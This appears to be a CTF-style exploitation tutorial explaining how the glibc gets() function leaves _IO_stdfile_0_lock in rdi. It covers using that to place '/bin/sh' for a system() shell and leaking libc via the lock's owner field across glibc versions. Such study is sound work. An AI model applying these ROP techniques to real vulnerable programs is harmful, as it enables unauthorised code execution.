ret2gets
Who needs "pop rdi" when you have gets()
Last updated
Who needs "pop rdi" when you have gets()
Last updated
Ah the gets
function, a staple of insecure coding and overflow challenges, reading as much data as possible upto a \n
. While most people are interested in its unlimited overflow, I'm interested in its applications for rdi
control, and even libc leaks. What am I talking about you may be asking?
Well, let's go back to the demo program.
Running this under gdb
, let's enter any string, and see what happens to the registers after gets
, because as you probably know, many functions will clobber the argument variables as they have no need to preserve them, and will use them either as scratch registers, or in other function calls (or both!). For gets
, all we'd need is some writable address to land in rdi
, then perhaps we could do something?
Bingo! We have a address which appears to exist in libc's writable region, so by calling gets
again in our rop chain, we could overwrite libc data, perhaps smash some useful structures. However, without a libc leak that could be limited. There could be multiple ways to utilise this, but the one I'm most interested in here is smashing _IO_stdfile_0_lock
.
_IO_stdfile_0_lock
Let's not beat around the bush, glibc's IO is complicated, so much so that there's a whole category related to IO exploitation, called FSOP
. That won't be the focus here, instead we're looking at what's generally overlooked when it comes to glibc IO: locking.
Because glibc supports multithreading, many glibc functions need to be thread-safe, which means that they're resistant to data racing. This is a problem faced by glibc IO, because multiple threads can use the same FILE
structures at the same time, so if 2 threads try to use one at the same time, this is called a race condition, and it can break the FILE
. We fix this using locks.
If you've ever looked at glibc source code for IO functions (as you do), you may noticed a common pattern with a lot of them (except printf and scanf, as they're more complicated, more on those later). Let's take gets (2.35 for now):
At the start of the function it uses _IO_acquire_lock
, and at the end it uses _IO_release_lock
. The idea is that acquiring the lock tells other threads that stdin
is currently in use, and any other threads that try to access stdin
will be forced to wait until this thread releases the lock, telling other threads that stdin
is no longer in use.
For this reason, FILE
has a field _lock, which is a pointer to a _IO_lock_t (stored at offset +0x88
):
I had some trouble finding the necessary macros and functions for acquiring and releasing locks, so I'll make a note here. I use elixir bootlin for reading and searching the glibc code base. When searching for _IO_acquire_lock
, we get multiple definitions, which isn't very helpful (same thing for _IO_release_lock
).
So which one gets used?
sysdeps/htl
: This is the Hurd version
, which would be used on GNU Hurd. This isn't nearly as common as GNU Linux
, so we can ignore this one.
sysdeps/generic
: Like the name suggests, this is designed to work anywhere which doesn't have a specific definition, like a fallback. This isn't used in our case.
libio/libioP.h
: Seems to be another fallback, in a specific case at least, when _IO_MTSAFE_IO
isn't defined. If these were used, no locking is done at all, so this implies this is when we don't care about thread safety.
In our case _IO_MTSAFE_IO
is set, so we can ignore this.
The correct one is sysdeps/nptl
, otherwise known as Native POSIX Threads Library
.
_IO_acquire_lock
/_IO_release_lock
These macros are defined as follows:
This may look confusing, but the 2 important functions to take away from this are _IO_flockfile
and _IO_acquire_lock_fct
. The __attribute__((cleanup))
maybe look bizarre, but all it does is call _IO_acquire_lock_fct
on _fp
when the end of the artificial do-while(0)
block is over (basically at the end of the IO function). _IO_acquire_lock_fct is defined as:
So really from this, the 2 macros for locking and unlocking are _IO_flockfile and _IO_funlockfile.
_IO_USER_LOCK=0x8000
is a macro which seems to indicate whether or not the inbuilt locking should be used or not. This is usually used internally, like in helper streams in printf
for example. For our purposes we can ignore this, as this check will always pass for stdin
(or any of the standard streams for that matter). Finally we get to the macros that we care about: _IO_lock_lock
and _IO_lock_unlock
.
_IO_lock_lock
/_IO_lock_unlock
_IO_lock_lock and _IO_lock_unlock are defined as:
Note that _name
is the lock itself, and in the case of gets
, is _IO_stdfile_0_lock
.
Let's break this down. The owner
field stores the address of TLS
(Thread Local Storage) structure for the thread currently using the lock (if you're wondering what the TLS
structure is, it's the structure whose address is stored in the fs
register; it also stores the canary, and you've likely seen fs:[0x28]
in disassembly). So when locking, if the owner
is different to THREAD_SELF
(i.e. lock is owned by a different thread), it waits until that thread has unlocked using lll_lock
, then claims ownership of the lock. When unlocking, it removes its ownership, and signals that it's no longer in use with lll_unlock
.
The use of cnt
is a bit bizarre to me. The only way I could see this being useful is if the same thread had to use the lock multiple times, perhaps due to recursive(?) calls. Perhaps it's just a flexibility thing, I'm not sure. But what I can tell you is that this will be useful for us in a moment ;)
_IO_stdfile_0_lock
in rdi
?You may be wondering why this happens, and while this is slightly bizarre, I can give an educated guess.
For one thing, _IO_lock_unlock
is what's called at the very end of most IO functions, including gets
, so its effects on the registers are the most recent before returning, with nothing afterwards clobbering the registers.
Above is the disassembly of _IO_lock_unlock
. rbp
stores the address of stdin
, so +182
is checking _IO_USER_LOCK
. But then look at +191
. Recall that _lock
is stored at an offset of +0x88
, so this must be loading stdin._lock
, which as we know is _IO_stdfile_0_lock
, and we see that it's loading into rdi
! Then pretty soon afterwards it returns, without clobbering rdi
(__lll_lock_wait_private
doesn't clobber it either, it's just a thin wrapper around the futex
syscall).
So that's where _IO_stdfile_0_lock
comes from, but where did it go? why does _lock
get loaded into rdi
?
That's a good question, to which my best guess would be that it's an optimization made by the compiler. In the case where lll_unlock
is called, the address of _lock
is passed directly to the futex
wrapper as the one and only argument (i.e. through the rdi
register). Therefore it loads _lock
into rdi
so that it doesn't need to use an extra assignment to prepare the call to futex
like mov rdi, [register containing _lock]
, which saves space and time.
2.30
While we're mainly looking at 2.34+
, let's have a brief look at versions prior to that. It appears that prior to 2.30
, the disassembly looks a bit different. For example, the following is from 2.29
.
Instead of loading it into rdi
, it loads it into rdx
, then later into rdi
just for the futex
call? And what's going on around the call to __lll_unlock_wake_private
with rsp
? This seems like a bizarre choice for the compiler to make, and the reason for that is that this part is written in assembly. I couldn't tell you why, but what I can say is that this causes problems for us, as _lock
only gets loaded into rdi
under very specific cirumstances, which hinders our potential techniques.
For fun, I decided to write a python script which uses angr
that can detect this behaviour automatically, for a given libc.
The libc doesn't require debug symbols, and the script should work for 2.23-2.39
, as these were the versions I tested (2.39
is the most recent version as of writing this).
Now for the fun stuff. I'm gonna show you 2 simple techniques which can help you with your ropping, one for controlling rdi
and another for leaking libc.
I'll demonstrate these using the demo program, which is patched to run using glibc 2.35 (that'll be important later).
rdi
One idea you may have already had is that, since _IO_stdfile_0_lock
always ends up in rdi
after a call to gets
, and gets
allows us to write arbitrary data to a pointer in rdi
, then surely we can just write /bin/sh
to _IO_stdfile_lock
, right?
If you were thinking that, then good job, because you're correct, we can!
Since rdi -> _IO_stdfile_0_lock
, another call to gets
will write data there. Then we'd send /bin/sh
, and then that 2nd call to gets
will return _IO_stdfile_0_lock -> "/bin/sh"
in rdi
. This would get around needing to use pop rdi ; ret
to get a pointer to /bin/sh
, so if you had system
available, then you could get a shell!
One important thing to note is that after we overwrite the lock, _IO_lock_unlock
will be executed before we return. This will decrement cnt
, and if the new cnt
is 0
, then lll_unlock
will clobber our data! This is why it's important to overwrite cnt
to a value other than 1
, and we have to adjust that value to be +1
more than what we want. The code for this would be as follows:
While this will of course SEGFAULT
, we see our desired result of rdi -> "/bin/sh"
!
Another thing to note is that /bin/sh
will remain in _IO_stdfile_0_lock
until we change it back, so after any subequent calls to gets
, we'll get back this pointer to /bin/sh
. Because even though the locking will increment the cnt
, it will leave the rest of the contents alone, then unlocking will decrement it back.
This relies on being able to skip over lll_unlock
by having a large value for cnt
.
But for 2.29
and prior, it only loads _lock
into rdi
when calling lll_unlock
, so this won't work as rdi
won't end up pointing to _IO_stdfile_0_lock -> "/bin/sh"
.
I also found out that I'm not the first person to discover this, w3th4nds beat me to it with the challenge Sound of Silence, and I wouldn't be surprised if it's been found/used before then, I just hadn't seen it before writing this.
There are a few ways you can leak libc using gets
. For one, if you have access to printf
, then you can just use the trick above to enter a format string and then call printf
.
But what if you don't have printf
, and instead have only puts
? Well fear not, because we have another trick up our sleeves: _lock.owner
.
Recall the _IO_lock_t
structure:
And also recall that owner
gets assigned the address of the TLS
structure for this thread. While it isn't immediately at the start of the lock, it's not far out of our reach, so what if we were able to pad upto to it, then call puts
. Since TLS
(at least for the main thread) is allocated relative to libc, all you'd need is the offset from TLS
to libc base.
Unfortunately this leak can cause problems depending on the kernel(?), because the TLS can be in different places on different machines, and it doesn't seem to be fixable by using the same docker.
So keep that in mind when transferring the exploit to remote.
While I suspect this is due to a kernel difference, if anyone knows exactly why, I'd love to hear it, and I could include it here as well.
There are initially a few problems with this:
All input using gets
is terminated by a null byte
owner
gets NULL
'ed when unlocking if --cnt==0
(i.e. cnt==1
)
But both of these can be solved with one input:
The main idea behind this is that we want to set cnt=0
, so that when it comes to unlocking, it will decrement count first, then check it against 0
, which fails because now cnt=0xffffffff
, due to an integer underflow. What this does is eliminate the terminating null byte from gets
, but also since the check fails, owner
doesn't get NULL
'ed, meaning we have uninterrupted padding upto owner=TLS
, meaning we can then call puts
and leak TLS
.
The above was tested on 2.35, and should work for 2.30-2.36, but 2.37 changed _IO_lock_lock and _IO_lock_unlock to:
Bit more complicated now, but the main takeaways are:
The inclusion of SINGLE_THREAD_P
cnt
is only decremented if cnt != 0
Seems now that cnt = 0
doesn't necessarily imply that the lock isn't being used, but rather not being used by 2+ instances.
This forces us to adjust our techniques slightly, especially for leaking libc (the controlling of rdi
, in its current state anyway hasn't been affected). This is because we can no longer cause an integer underflow to eliminate the terminating null byte, as it refuses to decrement cnt=0
.
Fortunately there is a way around this, but it will require an extra call to gets
.
So what's going on here?
The main aim of the first gets
is to do the following:
Set lock = 0
, which marks the lock as unlocked.
Fill cnt
with junk.
Clobber owner
so that owner != THREAD_SELF
Then on the last call to gets
, when _IO_lock_lock
is executed:
This check will fail, even if the process is single-threaded, because we set owner
to junk, so owner != NULL
. You could do a version where this case passes if you wanted, I decided to make the technique not reliant on it being single-threaded (i.e. more versatile).
This check will succeed.
Unforunately this is unavoidable, but since we set lock = 0
, this lock is marked as unlocked, so this will just lock it (set lock = 1
).
Bingo! The owner
gets set to the TLS
structure, which is what we want to leak
Since lock = 1
, it contains null bytes which would terminate puts
, so here we need to fill lock
with junk ("CCCC"
). But what about the null byte from gets
? Just like before, the cnt
getting decremented in unlocking will help to eliminate this null byte.
p.sendline(b"CCCC")
will write a null byte into the LSB
of cnt
. In _IO_lock_unlock
, cnt
gets decremented as cnt != 0
, which converts the \x00
into \xff
, and just like before, the unlocking will leave owner
alone.
And just like that, we now have padding upto owner=TLS
.
This version of the leak will actually work before 2.37 as well, so this is the more versatile one.
rdi != _IO_stdfile_0_lock
?This is all pretty cool (in my opinion at least if you disagree you're wrong), but what if we were presented the following program:
Now we have a problem. While gets
would place _IO_stdfile_0_lock
into rdi
, the subequent puts
call would clobber it. Now what?
Ideally we'd want to find a way to put _IO_stdfile_0_lock
into rdi
, and fortunately there are a few tricks we can use in certain cases:
rdi
is writableEven if it isn't _IO_stdfile_0_lock
, any writable rdi
would be a valid condidate for a gets
call, which would then put _IO_stdfile_0_lock
back into rdi
!
A common case for this is after some other IO function. Recall that most IO functions follow that locking pattern, which includes puts
. So in the above example, rdi
would be _IO_stdfile_1_lock
, which we can just call gets
on to get our beloved _IO_stdfile_0_lock
. For dealing with another IO lock, you can use p.sendline(b"\x01")
, as the expected value for lock
will be 1
(LLL_LOCK_INITIALIZER_LOCKED
).
rdi
is readableWhile this won't make for a valid candidate for gets
, it would make a valid candidate for puts
, so call to puts
would put into Case 1
, and so you can then apply the above.
rdi == NULL
This won't be usable in most IO functions unfortunately. But printf
isn't just another IO function, it's built different. Let's take a look shall we? Don't worry, we won't go too far ;)
Note that scanf
follows a very similar pattern, and displays the same behaviour as printf in this regard.
printf is defined as follows:
Here we see it calls __vfprintf_internal
with the first argument (i.e. rdi
) being stdout
.
Then in __vfprintf_internal we see that early on it calls ARGCHECK
The main takeaway from all of this is that ARGCHECK
forces printf
to return early if format == NULL
, meaning it won't SEGFAULT
. And since __vfprintf_internal
was called with stdout
as the first argument, we can guess that it should be preserved until returning. So, is it?
Yes it is! So now we can just use this as a writable address.
There's also a possibility here to use an FSOP
technique to get a leak. I won't go into detail here, but if you're interested here are some links:
Normally fflush
is called with a single FILE
to flush its contents:
However you can call fflush(NULL)
, which will go through every FILE
and flush all of them.
It does by calling _IO_flush_all.
Then at the end of _IO_flush_all(_lockp)
, it first unlocks list_all_lock
, which is used to lock the list of all FILE
's. While this would put a lock into rdi
, that's not what reaches the end.
It then calls _IO_cleanup_region_end(0)
, which is effectively just:
This then goes onto call __libc_cleanup_pop_restore with a first argument of &_buffer
, which is preserved until returning. _buffer
is a cleanup buffer, which is stored on the stack, so a stack pointer is returned in rdi
! For more information, see here.
rdi
is junkThere's actually a non-IO function that can be used here: rand
, which returns a pointer to unsafe_state
in rdi
across a broad range of libc versions. More details on this can be found here.
In theory, these functions would be perfect. The argument wouldn't matter, and as IO functions usually unlock at the very end, they would place a lock into rdi
(getchar
would give you _IO_stdfile_0_lock_
). Unfortunately, there's an optimization in the way: _IO_need_lock
.
So if the FILE
is determined to not need a lock, then it doesn't use one?
It turns out that for some simpler IO functions, the locking can be optimized away in the single-threaded case:
And when a thread is made, _IO_enable_locks is called, which ensures all new and old FILE
's have the _IO_FLAGS2_NEED_LOCK
flag set.
So, when the application is multithreaded, getchar
/putchar
would use locking, otherwise it would just follow the behaviour of _IO_(getc|putc)_unlocked
.
Since this is a macro, the fp
wouldn't be loaded into rdi
, so the only chance you really have is if __uflow
for example did something useful. In getchar
, if stdin
is unbuffered (or buffer is empty), it will call read(0, ...)
, which leaves rdi=0
, and maybe you can then use the rdi=NULL
case functions.
These are just a few functions which can help, there could be many more that I'm not aware of. Most of these are just some common ones which have one thing in common: they're IO functions.
If anyone has any other tricks for this, I'd be interested to know, and maybe I'll update this to include them, with credit of course :)